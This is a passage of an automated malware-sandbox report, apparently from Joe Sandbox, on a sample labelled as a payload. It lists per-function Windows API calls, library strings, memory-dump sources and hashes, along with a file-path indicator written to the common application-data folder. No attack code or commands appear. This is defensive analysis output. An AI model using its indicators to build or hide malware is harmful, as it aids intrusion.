                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: DecodePointer_write_multi_char$_write_string$__aulldvrm__cftof_free_strlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 1678825546-0
                                                                                                  • Opcode ID: 589e2253d7d99ae0dcbf429e34422fb1402ab038db5a2f2b80cba858938edee3
                                                                                                  • Instruction ID: db0106d3cd2a209daaf701dc4660ec0645153b96933329033a839e51ad18d518
                                                                                                  • Opcode Fuzzy Hash: 589e2253d7d99ae0dcbf429e34422fb1402ab038db5a2f2b80cba858938edee3
                                                                                                  • Instruction Fuzzy Hash: 74719771E191299FDF349B58CC89BAABFB5EB54314F1440EAD908A7241E7389E80CF58
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _write_multi_char$_write_string$__cftof_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 2964551433-0
                                                                                                  • Opcode ID: 8347831fef84488c459b73e38159c62a9e748b91cd076f531bd17fa48cd5ce32
                                                                                                  • Instruction ID: 6dfa00c010dbefa414ce4eddc8cc909984c6b6d902008f775bdc6c94e6656538
                                                                                                  • Opcode Fuzzy Hash: 8347831fef84488c459b73e38159c62a9e748b91cd076f531bd17fa48cd5ce32
                                                                                                  • Instruction Fuzzy Hash: 99517571E18128AFDF309B68CC99BEA7BB5EB04314F0400EAD908A6251E7399F80CF54
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _write_multi_char$_write_string$__cftof_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 2964551433-0
                                                                                                  • Opcode ID: 9184f045ad01bb42410d4e7ab6faa150617f92114e0b0a62860346184688369c
                                                                                                  • Instruction ID: f47cafaf1bae3337dbff7a3e94d8654fa62cb5063c32bef40ce67090da32664e
                                                                                                  • Opcode Fuzzy Hash: 9184f045ad01bb42410d4e7ab6faa150617f92114e0b0a62860346184688369c
                                                                                                  • Instruction Fuzzy Hash: 31516771E19119AFDF309B68CC99BEA7BB5EF04314F0400EAD908A6251E7399F80CF54
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • ___unDName.LIBCMT ref: 004A071B
                                                                                                  • _strlen.LIBCMT ref: 004A072E
                                                                                                  • __lock.LIBCMT ref: 004A074A
                                                                                                  • _malloc.LIBCMT ref: 004A075C
                                                                                                  • _malloc.LIBCMT ref: 004A076D
                                                                                                  • _free.LIBCMT ref: 004A07B6
                                                                                                    • Part of subcall function 004942FD: IsProcessorFeaturePresent.KERNEL32(00000017,004942D1,i;I,?,?,00490CE9,0049520D,?,004942DE,00000000,00000000,00000000,00000000,00000000,0049981C), ref: 004942FF
                                                                                                  • _free.LIBCMT ref: 004A07AF
                                                                                                    • Part of subcall function 00490BED: HeapFree.KERNEL32(00000000,00000000,?,0049507F,00000000,0049520D,00490CE9), ref: 00490C01
                                                                                                    • Part of subcall function 00490BED: GetLastError.KERNEL32(00000000,?,0049507F,00000000,0049520D,00490CE9), ref: 00490C13
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free_malloc$ErrorFeatureFreeHeapLastNamePresentProcessor___un__lock_strlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3704956918-0
                                                                                                  • Opcode ID: 40e80c65a409867e60ff58b8b872350d0eb749a376a93f2f60929b0165628eae
                                                                                                  • Instruction ID: 6807e3f57fe1cac5c6bd2d1f0ce3b4642227af9165e4f35c9e07985e049b62f2
                                                                                                  • Opcode Fuzzy Hash: 40e80c65a409867e60ff58b8b872350d0eb749a376a93f2f60929b0165628eae
                                                                                                  • Instruction Fuzzy Hash: 0921D8B5900706AFDB11AB75C846B1BBBD4AF16314F10813FF4199B282EA7CE800CA98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • timeGetTime.WINMM ref: 00481B1E
                                                                                                  • timeGetTime.WINMM ref: 00481B29
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00481B4C
                                                                                                  • DispatchMessageW.USER32(?), ref: 00481B5C
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00481B6A
                                                                                                  • Sleep.KERNEL32(00000064), ref: 00481B72
                                                                                                  • timeGetTime.WINMM ref: 00481B78
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                                  • String ID:
                                                                                                  • API String ID: 3697694649-0
                                                                                                  • Opcode ID: 3aa2a2081e82dc3f7f0447c93f0b506eecb999da8e5d3498334b0fce6e883a48
                                                                                                  • Instruction ID: c3254dfce82753abd4a5dd286471df2b6364e88bcf89fb49c72a769b522d794e
                                                                                                  • Opcode Fuzzy Hash: 3aa2a2081e82dc3f7f0447c93f0b506eecb999da8e5d3498334b0fce6e883a48
                                                                                                  • Instruction Fuzzy Hash: 6A018432A40319ABDB20A7E59C45FEEB76CBB08B40F044467F700B7290E674B905CBE9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • __init_pointers.LIBCMT ref: 00495141
                                                                                                    • Part of subcall function 00497D6C: EncodePointer.KERNEL32(00000000,?,00495146,00493FFE,00577990,00000014), ref: 00497D6F
                                                                                                    • Part of subcall function 00497D6C: __initp_misc_winsig.LIBCMT ref: 00497D8A
                                                                                                    • Part of subcall function 00497D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004A26B3
                                                                                                    • Part of subcall function 00497D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004A26C7
                                                                                                    • Part of subcall function 00497D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004A26DA
                                                                                                    • Part of subcall function 00497D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004A26ED
                                                                                                    • Part of subcall function 00497D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004A2700
                                                                                                    • Part of subcall function 00497D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 004A2713
                                                                                                    • Part of subcall function 00497D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 004A2726
                                                                                                    • Part of subcall function 00497D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 004A2739
                                                                                                    • Part of subcall function 00497D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 004A274C
                                                                                                    • Part of subcall function 00497D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 004A275F
                                                                                                    • Part of subcall function 00497D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 004A2772
                                                                                                    • Part of subcall function 00497D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 004A2785
                                                                                                    • Part of subcall function 00497D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 004A2798
                                                                                                    • Part of subcall function 00497D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004A27AB
                                                                                                    • Part of subcall function 00497D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004A27BE
                                                                                                    • Part of subcall function 00497D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004A27D1
                                                                                                  • __mtinitlocks.LIBCMT ref: 00495146
                                                                                                  • __mtterm.LIBCMT ref: 0049514F
                                                                                                    • Part of subcall function 004951B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00495154,00493FFE,00577990,00000014), ref: 00498B62
                                                                                                    • Part of subcall function 004951B7: _free.LIBCMT ref: 00498B69
                                                                                                    • Part of subcall function 004951B7: DeleteCriticalSection.KERNEL32(0057AC00,?,?,00495154,00493FFE,00577990,00000014), ref: 00498B8B
                                                                                                  • __calloc_crt.LIBCMT ref: 00495174
                                                                                                  • __initptd.LIBCMT ref: 00495196
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0049519D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 3567560977-0
                                                                                                  • Opcode ID: 8be3280ce5d3c208eba132a50c1da2fa939805b9f489c5f03bb567c19223143c
                                                                                                  • Instruction ID: 5c65eb308f1a0743318278601e83aefcf7454e18c5a0504d699ec120c4f7c926
                                                                                                  • Opcode Fuzzy Hash: 8be3280ce5d3c208eba132a50c1da2fa939805b9f489c5f03bb567c19223143c
                                                                                                  • Instruction Fuzzy Hash: 4FF0C232949A111EEE267AB97C03B4B2E80AB11738B30073FF064D42D5EF1984415259
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • __lock.LIBCMT ref: 0049594A
                                                                                                    • Part of subcall function 00498AF7: __mtinitlocknum.LIBCMT ref: 00498B09
                                                                                                    • Part of subcall function 00498AF7: __amsg_exit.LIBCMT ref: 00498B15
                                                                                                    • Part of subcall function 00498AF7: EnterCriticalSection.KERNEL32(i;I,?,004950D7,0000000D), ref: 00498B22
                                                                                                  • _free.LIBCMT ref: 00495970
                                                                                                    • Part of subcall function 00490BED: HeapFree.KERNEL32(00000000,00000000,?,0049507F,00000000,0049520D,00490CE9), ref: 00490C01
                                                                                                    • Part of subcall function 00490BED: GetLastError.KERNEL32(00000000,?,0049507F,00000000,0049520D,00490CE9), ref: 00490C13
                                                                                                  • __lock.LIBCMT ref: 00495989
                                                                                                  • ___removelocaleref.LIBCMT ref: 00495998
                                                                                                  • ___freetlocinfo.LIBCMT ref: 004959B1
                                                                                                  • _free.LIBCMT ref: 004959C4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                  • String ID:
                                                                                                  • API String ID: 626533743-0
                                                                                                  • Opcode ID: 27907389452f787d3a7e593951b0d20cc29a6730cb383785a46313037da17430
                                                                                                  • Instruction ID: f249f46c6f42273752909aa8e08ed9646a80991c309b3aefce8110f973143812
                                                                                                  • Opcode Fuzzy Hash: 27907389452f787d3a7e593951b0d20cc29a6730cb383785a46313037da17430
                                                                                                  • Instruction Fuzzy Hash: DE018EB1102B00EAEE366B69E446B1E7EA06F40739F30423FF069961D5CF7C99809B5D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __aulldvrm
                                                                                                  • String ID: $+$0123456789ABCDEF$UlL
                                                                                                  • API String ID: 1302938615-2298492726
                                                                                                  • Opcode ID: 95c6b0c7c75fbf560ad59cb78633b2e4494a2cc2c108b5b55a41a99c12dcbab6
                                                                                                  • Instruction ID: 9f9202a1754f5e86394f19dd2f5a49f7d043a907823e39054228d3cbee8b654c
                                                                                                  • Opcode Fuzzy Hash: 95c6b0c7c75fbf560ad59cb78633b2e4494a2cc2c108b5b55a41a99c12dcbab6
                                                                                                  • Instruction Fuzzy Hash: 06817BB5A087509FD750CE298840B2BBBE5BFC8758F15091EF98997312D338DD058F96
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 004C07C3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ___from_strstr_to_strchr
                                                                                                  • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                                  • API String ID: 601868998-2416195885
                                                                                                  • Opcode ID: 2790e88a12baf5cc6afa652aeef27f878c31d4bd392631b5c91d9d517856f60c
                                                                                                  • Instruction ID: cf6dc89fcface54a1f4955e5a0efa4881a78617cf9d11e31e1c2e40530943f1a
                                                                                                  • Opcode Fuzzy Hash: 2790e88a12baf5cc6afa652aeef27f878c31d4bd392631b5c91d9d517856f60c
                                                                                                  • Instruction Fuzzy Hash: D141E479A053059BDB24EE15CC45FAFB7D8AF85308F00082FF58593242E678E9088BA6
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: .\crypto\buffer\buffer.c$g9M
                                                                                                  • API String ID: 2102423945-1309922662
                                                                                                  • Opcode ID: bf4bd81a593df3420a4a0975a646d960b0bae87ba2fe15f42d4ee39586a6c9ed
                                                                                                  • Instruction ID: ef5e751dfd5fd7ce42bed1f925f3e81e40849916fb665dfb7638c11f06ce11df
                                                                                                  • Opcode Fuzzy Hash: bf4bd81a593df3420a4a0975a646d960b0bae87ba2fe15f42d4ee39586a6c9ed
                                                                                                  • Instruction Fuzzy Hash: 5621E4BAB403217BE610665DFC52F56B799EB94B18F00413FF609D72C2D2A4E821C7D9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • __getptd_noexit.LIBCMT ref: 00535D3D
                                                                                                    • Part of subcall function 0049501F: GetLastError.KERNEL32(?,i;I,0049520D,00490CE9,?,?,00493B69,?), ref: 00495021
                                                                                                    • Part of subcall function 0049501F: __calloc_crt.LIBCMT ref: 00495042
                                                                                                    • Part of subcall function 0049501F: __initptd.LIBCMT ref: 00495064
                                                                                                    • Part of subcall function 0049501F: GetCurrentThreadId.KERNEL32 ref: 0049506B
                                                                                                    • Part of subcall function 0049501F: SetLastError.KERNEL32(00000000,i;I,0049520D,00490CE9,?,?,00493B69,?), ref: 00495083
                                                                                                  • __calloc_crt.LIBCMT ref: 00535D60
                                                                                                  • __get_sys_err_msg.LIBCMT ref: 00535D7E
                                                                                                  • __get_sys_err_msg.LIBCMT ref: 00535DCD
                                                                                                  Strings
                                                                                                  • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 00535D48, 00535D6E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
                                                                                                  • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                  • API String ID: 3123740607-798102604
                                                                                                  • Opcode ID: fe8ca63e3b9d375a45f67829b9b44256706f38210b0bdde48c1201a77b8b4c50
                                                                                                  • Instruction ID: 9081c322963befa2921969b222935820f7f0c10839b0db2791c075d226ec47f2
                                                                                                  • Opcode Fuzzy Hash: fe8ca63e3b9d375a45f67829b9b44256706f38210b0bdde48c1201a77b8b4c50
                                                                                                  • Instruction Fuzzy Hash: 5E11C831501E156BEB223B769C05AAB7FDCFF417A4F10187AFD05DB541FA259E0142E4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _fprintf_memset
                                                                                                  • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                                                                                                  • API String ID: 3021507156-3399676524
                                                                                                  • Opcode ID: 14b7a94106164ec789fd72fe20a3e9a722f291b85196b0c89549c9cc8692a121
                                                                                                  • Instruction ID: 0040a9c0540f1feac995dc5228ecae64d15c5d348999cfaa00a142e61524a13a
                                                                                                  • Opcode Fuzzy Hash: 14b7a94106164ec789fd72fe20a3e9a722f291b85196b0c89549c9cc8692a121
                                                                                                  • Instruction Fuzzy Hash: D7218B76A043113BE721AA226C01FBB7B99DFC279DF04442AFE50673C6D625DD0542BA
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0047C51B
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0047C539
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
